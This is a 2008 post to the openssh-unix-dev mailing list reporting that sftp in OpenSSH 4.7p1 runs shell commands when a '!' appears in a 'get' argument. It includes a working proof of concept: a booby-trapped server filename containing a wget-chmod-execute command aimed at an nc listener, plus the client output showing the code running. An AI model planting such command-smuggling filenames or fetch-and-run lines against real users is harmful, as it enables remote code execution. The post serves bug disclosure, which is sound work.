Strange sftp input parameter handling, user assisted code execution?

Roman Fiedler roman.fiedler at telbiomed.at
Wed Jun 18 17:23:09 EST 2008


Damien Miller wrote:
> On Wed, 18 Jun 2008, Damien Miller wrote:
>
>> On Tue, 17 Jun 2008, Roman Fiedler wrote:
>>
>>> Hello list,
>>>
>>> I use openssh-client 1:4.7p1-8ubuntu1.2. After authentication:
>>>
>>> sftp>  get !xxxx
>>> /bin/bash: xxxx: command not found
>>> Shell exited with status 127
>> Can you reproduce this with OpenSSH 5.0p1?
>
> I can't reproduce this with 5.0, but I can with 4.7p1 so I guess
> it was fixed in my sftp argument processing rewrite.
>
> -d

Thats good. I was just confused that the ! did also work for the 
arguments and not only in front of a command (!get). I just did not 
think that copy/pasting a remote filename to a get could cause this 
behavior.

I looked at it a little bit closer and found that only direct copy and 
paste of filenames from "ls" output can be harmful, no problem with mget *.

lg roman

PS: You were correct that the /bin/bash test did not work, that was a 
mistake during testing, but other testcase works:

Server:
   cd Tmp
   touch '!wget -O cmds 10.255.255.2:1234 ; chmod 0755 cmds ; . cmds'
   nc -vnlp 1234

   When connected send:
HTTP/1.1 200 OK
Content-Length: 60

echo "This output is from remote command!"
# padding ................................

Client:
sftp> cd Tmp
sftp> ls
!wget -O cmds 10.255.255.2:1234 ; chmod 0755 cmds ; . cmds 

sftp> get !wget -O cmds 10.255.255.2:1234 ; chmod 0755 cmds ; . cmds
--09:09:32--  http://10.255.255.2:1234/
            => `cmds'
Connecting to 10.255.255.2:1234... connected.
HTTP request sent, awaiting response... 200 OK
Length: 70

100%[====================================>] 70            --.--K/s 


09:09:36 (102.05 KB/s) - `cmds' saved [70/70]

This output is from remote command!
sftp>

(The wget line is splitted across lines, in mail client, make sure to 
have one line in test).



More information about the openssh-unix-dev mailing list